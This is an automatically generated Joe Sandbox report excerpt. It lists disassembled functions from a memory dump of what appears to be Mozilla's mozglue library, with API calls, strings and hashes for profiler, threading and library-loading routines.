seqstyle, xrefs: 6CCDCCE6
stackwalk, xrefs: 6CCDCCF8
mainthreadio, xrefs: 6CCDCC7C
noiostacks, xrefs: 6CCDCCBE
Unrecognized feature "%s"., xrefs: 6CCDCEA0
notimerresolutionchange, xrefs: 6CCDCE00
samplingallthreads, xrefs: 6CCDCE2C

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: aa9d39d085e62f5370bb348a60ab87acc2ca53acea75219d388da146f945de27
Instruction ID: b92d09d77d405cd1db58641acbbc075f5fb310bb036bb704c1379e94b5818cec
Opcode Fuzzy Hash: aa9d39d085e62f5370bb348a60ab87acc2ca53acea75219d388da146f945de27
Instruction Fuzzy Hash: D951A9C1B5522522FA007F1A6D10BAB6645FB5324AF21447EFF09A1EE0FB14B21DC6B7

Function 6CCA4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCA4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CCA44B2,6CD1E21C,6CD1F7F8), ref: 6CCA473E
Part of subcall function 6CCA4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CCA474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CCA44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CCA44D2
InitOnceExecuteOnce.KERNEL32(6CD1F80C,6CC9F240,?,?), ref: 6CCA451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CCA455C
LoadLibraryW.KERNEL32(?), ref: 6CCA4592
InitializeCriticalSection.KERNEL32(6CD1F770), ref: 6CCA45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6CCA45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6CCA45BB
InitOnceExecuteOnce.KERNEL32(6CD1F818,6CC9F240,?,?), ref: 6CCA4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CCA4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6CCA4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6CCA466D
VerSetConditionMask.NTDLL ref: 6CCA469F
VerSetConditionMask.NTDLL ref: 6CCA46AB
VerSetConditionMask.NTDLL ref: 6CCA46B2
VerSetConditionMask.NTDLL ref: 6CCA46B9
VerSetConditionMask.NTDLL ref: 6CCA46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CCA46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6CCA46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CCA46FD

Strings

WRusr.dll, xrefs: 6CCA44B5
NativeNtBlockSet_Write, xrefs: 6CCA46F7
l, xrefs: 6CCA4578
user32.dll, xrefs: 6CCA4557, 6CCA463F
kernel32.dll, xrefs: 6CCA44CD

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: 93bd2a7d3f36f1db290ce2f2a6856b58ed843120b8171a3efbfdeb7a4cf83a54
Instruction ID: 1db1134b4f41fbf75120a082d729a1d4ca1c0ba6f8b7ff2fcee59aeb11c4b063
Opcode Fuzzy Hash: 93bd2a7d3f36f1db290ce2f2a6856b58ed843120b8171a3efbfdeb7a4cf83a54
Instruction Fuzzy Hash: DA61C5F0608245AFFB00DFA5D80AB957BBCEB46308F048559E6049BE91EBB0D987CF51

Function 6CCDF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CCDF8F9

Part of subcall function 6CCA6390: GetCurrentThreadId.KERNEL32 ref: 6CCA63D0
Part of subcall function 6CCA6390: AcquireSRWLockExclusive.KERNEL32 ref: 6CCA63DF
Part of subcall function 6CCA6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CCA640E

ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF93A
GetCurrentThreadId.KERNEL32 ref: 6CCDF98A
GetCurrentThreadId.KERNEL32 ref: 6CCDF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF716

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

Part of subcall function 6CC9B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC9B5E0

GetCurrentThreadId.KERNEL32 ref: 6CCDF739
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF746
GetCurrentThreadId.KERNEL32 ref: 6CCDF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CD1385B,00000002,?,?,?,?,?), ref: 6CCDF829
free.MOZGLUE(?,?,00000000,?), ref: 6CCDF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CCDF866
free.MOZGLUE(?), ref: 6CCDFA0C

Part of subcall function 6CCA5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA5E8C
Part of subcall function 6CCA5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5E9D
Part of subcall function 6CCA5E60: GetCurrentThreadId.KERNEL32 ref: 6CCA5EAB
Part of subcall function 6CCA5E60: GetCurrentThreadId.KERNEL32 ref: 6CCA5EB8
Part of subcall function 6CCA5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5ECF
Part of subcall function 6CCA5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CCA5F27
Part of subcall function 6CCA5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CCA5F47
Part of subcall function 6CCA5E60: GetCurrentProcess.KERNEL32 ref: 6CCA5F53
Part of subcall function 6CCA5E60: GetCurrentThread.KERNEL32 ref: 6CCA5F5C
Part of subcall function 6CCA5E60: GetCurrentProcess.KERNEL32 ref: 6CCA5F66
Part of subcall function 6CCA5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CCA5F7E

free.MOZGLUE(?), ref: 6CCDF9C5
free.MOZGLUE(?), ref: 6CCDF9DA

Strings

" attempted to re-register as ", xrefs: 6CCDF858
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CCDF9A6
Thread , xrefs: 6CCDF789
[D %d/%d] profiler_register_thread(%s), xrefs: 6CCDF71F

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 5d269574edc376a59040260f5e2bd15b6df505eb54e9658f3a89c5f48c977851
Instruction ID: ca99b9f39f932d2e197c568c60fe30dc31093dd2d06494de8bdf4f0c04675f48
Opcode Fuzzy Hash: 5d269574edc376a59040260f5e2bd15b6df505eb54e9658f3a89c5f48c977851
Instruction Fuzzy Hash: D3811571A047009FEB11DF64C840BAAB7B5FF85308F45451DEA4997B51FB30E849CB92

Function 6CCDEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDEE60
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEE6D
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CCDEEA5
CloseHandle.KERNEL32(?), ref: 6CCDEEB4
free.MOZGLUE(00000000), ref: 6CCDEEBB
GetCurrentThreadId.KERNEL32 ref: 6CCDEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDEECF

Part of subcall function 6CCDDE60: GetCurrentThreadId.KERNEL32 ref: 6CCDDE73
Part of subcall function 6CCDDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CCA4A68), ref: 6CCDDE7B
Part of subcall function 6CCDDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CCA4A68), ref: 6CCDDEB8
Part of subcall function 6CCDDE60: free.MOZGLUE(00000000,?,6CCA4A68), ref: 6CCDDEFE
Part of subcall function 6CCDDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CCDDF38

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

GetCurrentThreadId.KERNEL32 ref: 6CCDEF1E
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEF2B
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEF59
GetCurrentThreadId.KERNEL32 ref: 6CCDEFB0
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEFBD
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDEFE1
GetCurrentThreadId.KERNEL32 ref: 6CCDEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF000

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CCDF02F

Part of subcall function 6CCDF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CCDF09B
Part of subcall function 6CCDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CCDF0AC
Part of subcall function 6CCDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CCDF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6CCDF008
[I %d/%d] profiler_stop, xrefs: 6CCDEED7

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 359ed6d2d7fabc1b40e4666f4917646fe82859bd0e70c683ba93fdef172a85d1
Instruction ID: 4aa77d9a32a684b2d9b9c135ab69a225a40e2756b0da79c9d460846e2a166f3c
Opcode Fuzzy Hash: 359ed6d2d7fabc1b40e4666f4917646fe82859bd0e70c683ba93fdef172a85d1
Instruction Fuzzy Hash: 11512A75704311AFFB009B6AD40A795BBBCEB46358F11051DFB1983F81EB35680AC7A6

Function 6CCA5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5E9D

Part of subcall function 6CCB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B85
Part of subcall function 6CCB5B50: EnterCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B90
Part of subcall function 6CCB5B50: LeaveCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5BD8
Part of subcall function 6CCB5B50: GetTickCount64.KERNEL32 ref: 6CCB5BE4

GetCurrentThreadId.KERNEL32 ref: 6CCA5EAB
GetCurrentThreadId.KERNEL32 ref: 6CCA5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCA5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CCA6017

Part of subcall function 6CC94310: moz_xmalloc.MOZGLUE(00000010,?,6CC942D2), ref: 6CC9436A
Part of subcall function 6CC94310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC942D2), ref: 6CC94387

moz_xmalloc.MOZGLUE(00000004), ref: 6CCA5F47
GetCurrentProcess.KERNEL32 ref: 6CCA5F53
GetCurrentThread.KERNEL32 ref: 6CCA5F5C
GetCurrentProcess.KERNEL32 ref: 6CCA5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CCA5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6CCA5F27

Part of subcall function 6CCACA10: mozalloc_abort.MOZGLUE(?), ref: 6CCACAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA5E8C

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCA55E1), ref: 6CCA60CC

Strings

GeckoMain, xrefs: 6CCA5ECE, 6CCA6015

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 9838185d90c3b7c751926eee1ff0793262e13fc51a9d70d122412809bcfc8f5c
Instruction ID: ed0eec176e441c44c1abc84ce3356cd35c13ff765ddfe08cf12d4a00919bd551
Opcode Fuzzy Hash: 9838185d90c3b7c751926eee1ff0793262e13fc51a9d70d122412809bcfc8f5c
Instruction Fuzzy Hash: 5771F2B0A047419FD700DF69C484A6ABBF4FF5A304F04496DE58687F52E731E98ACB92

Function 6CCA9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC93217
Part of subcall function 6CC931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC93236
Part of subcall function 6CC931C0: FreeLibrary.KERNEL32 ref: 6CC9324B
Part of subcall function 6CC931C0: __Init_thread_footer.LIBCMT ref: 6CC93260
Part of subcall function 6CC931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC9327F
Part of subcall function 6CC931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC9328E
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC932AB
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC932D1
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC932E5
Part of subcall function 6CC931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC932F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CCA9675
__Init_thread_footer.LIBCMT ref: 6CCA9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CCA96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CCA9707
__Init_thread_footer.LIBCMT ref: 6CCA971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CCA9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CCA97B7
FreeLibrary.KERNEL32 ref: 6CCA97D0
FreeLibrary.KERNEL32 ref: 6CCA97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CCA9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CCA9670
NtMapViewOfSection, xrefs: 6CCA9701
ntdll.dll, xrefs: 6CCA96E3
MapViewOfFileNuma2, xrefs: 6CCA97B1

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 7840455c98847c297bc6320ffedec22a406b855972da63902c5303475a657841
Instruction ID: c541d7696d7a973d9ef4459ecf2a2e359e771622eae2f87e931b1408549a69f4
Opcode Fuzzy Hash: 7840455c98847c297bc6320ffedec22a406b855972da63902c5303475a657841
Instruction Fuzzy Hash: 8E61D7B17042029BEF00DFE5D88AB9A7BB9EB4A314F104519EA1583F90E731D856CBA1

Function 6CCDDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDDE73
GetCurrentThreadId.KERNEL32 ref: 6CCDDF7D
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDDF8A
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDDFC9
GetCurrentThreadId.KERNEL32 ref: 6CCDDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CCA4A68), ref: 6CCDDE7B

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CCA4A68), ref: 6CCDDEB8
free.MOZGLUE(00000000,?,6CCA4A68), ref: 6CCDDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CCDDF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6CCDDE83
<none>, xrefs: 6CCDDFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CCDE00E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 4dbddea4d8f3251f2b13e259384de0a6a97a83a9a650a7ad55a487e4de5078ce
Instruction ID: f60b6a68b84730c68c13ae4b9b69cacd324f8cf826952b524a045a4a76640b23
Opcode Fuzzy Hash: 4dbddea4d8f3251f2b13e259384de0a6a97a83a9a650a7ad55a487e4de5078ce
Instruction Fuzzy Hash: 53410675B016119BFB109F65D8057AAB779EB4630DF050019FB0997F41EB31A80ACBE6

Function 6CCED4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCED4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED52A
GetCurrentThreadId.KERNEL32 ref: 6CCED530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED55F
free.MOZGLUE(00000000), ref: 6CCED585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CCED5D3
GetCurrentThreadId.KERNEL32 ref: 6CCED5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED652
GetCurrentThreadId.KERNEL32 ref: 6CCED658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCED667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCED6A2

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
